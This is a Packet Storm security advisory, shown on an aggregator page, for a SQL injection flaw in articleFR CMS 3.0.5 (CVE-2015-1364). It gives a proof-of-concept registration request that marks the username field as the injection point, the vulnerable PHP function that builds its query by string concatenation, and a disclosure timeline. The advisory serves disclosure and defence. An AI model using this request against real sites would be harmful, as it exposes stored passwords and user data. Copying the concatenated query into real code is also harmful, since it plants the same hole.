articleFR CMS 3.0.5 SQL Injection

🗓️ 21 Jan 2015 00:00:00Reported by Tien Tran DinhType

packetstorm🔗 packetstormsecurity.com👁 42 Views

SQL injection in articleFR CMS 3.0.

Reporter	Title	Published	Views	Family All 10
CNVD	Free Reprintables ArticleFR SQL Injection Vulnerability	28 Jan 201500:00	–	cnvd
CVE	CVE-2015-1364	27 Jan 201517:00	–	cve
Cvelist	CVE-2015-1364	27 Jan 201517:00	–	cvelist
EUVD	EUVD-2015-1503	7 Oct 202500:30	–	euvd
NVD	CVE-2015-1364	27 Jan 201520:04	–	nvd
OpenVAS	ArticleFR CMS Multiple Vulnerabilities (Jan 2015)	29 Jan 201500:00	–	openvas
Prion	Sql injection	27 Jan 201520:04	–	prion
RedhatCVE	CVE-2015-1364	22 May 202500:40	–	redhatcve
securityvulns	articleFR CMS 3.0.5 - SQL injection vulnerability	23 Feb 201500:00	–	securityvulns
securityvulns	Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)	23 Feb 201500:00	–	securityvulns

`#Vulnerability title: SQL injection vulnerability in articleFR CMS 3.0.5  
#Product: articleFR  
#Vendor: http://freereprintables.com  
#Affected version: version 3.0.5  
#Download link: https://github.com/articlefr/articleFR  
#Fixed version: N/A  
#Google dork: N/A  
#Author: Tran Dinh Tien ([email protected]) & ITAS Team (www.itas.vn)  
  
  
::PROOF OF CONCEPT::  
  
+ REQUEST:  
POST /articlefr/register/ HTTP/1.1  
Host: target.org  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://target.org/articlefr/register/  
Cookie: _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4; PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 103  
  
username=[SQL INJECTION HERE]&email=test2%40itas.vn&name=test&password=123123&submit=register  
  
  
- Vulnerable file: articleFR/system/profile.functions.php  
- Vulnerable parameter: username  
- Query: SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'  
- Vulnerable function:   
function getProfile($_username, $_connection) {  
$_q = "SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username = '" . $_username . "'";  
$_result = single_resulti($_q, $_connection);  
  
$_retval['id'] = $_result['id'];  
$_retval['name'] = $_result['name'];  
$_retval['username'] = $_result['username'];  
$_retval['password'] = $_result['password'];  
$_retval['email'] = $_result['email'];  
$_retval['website'] = $_result['website'];  
$_retval['blog'] = $_result['blog'];  
$_retval['date'] = $_result['date'];  
$_retval['isactive'] = $_result['isactive'];  
$_retval['activekey'] = $_result['activekey'];  
$_retval['membership'] = $_result['membership'];  
  
return $_retval;  
}   
  
  
  
  
::DISCLOSURE::  
+ 12/09/2014: Contact to vendor - vendor did not reply  
+ 12/11/2014: Contact to vendor - vendor did not reply  
+ 12/22/2014: Contact to vendor - vendor replied  
+ 12/23/2014: Send the detail vulnerability to vendor - vendor did not reply  
+ 01/21/2015: Public information  
  
::REFERENCE::  
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-articlefr-cms-72.html  
  
  
::DISCLAIMER::  
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.  
`

21 Jan 2015 00:00Current

0.7Low risk

Vulners AI Score0.7

EPSS0.01978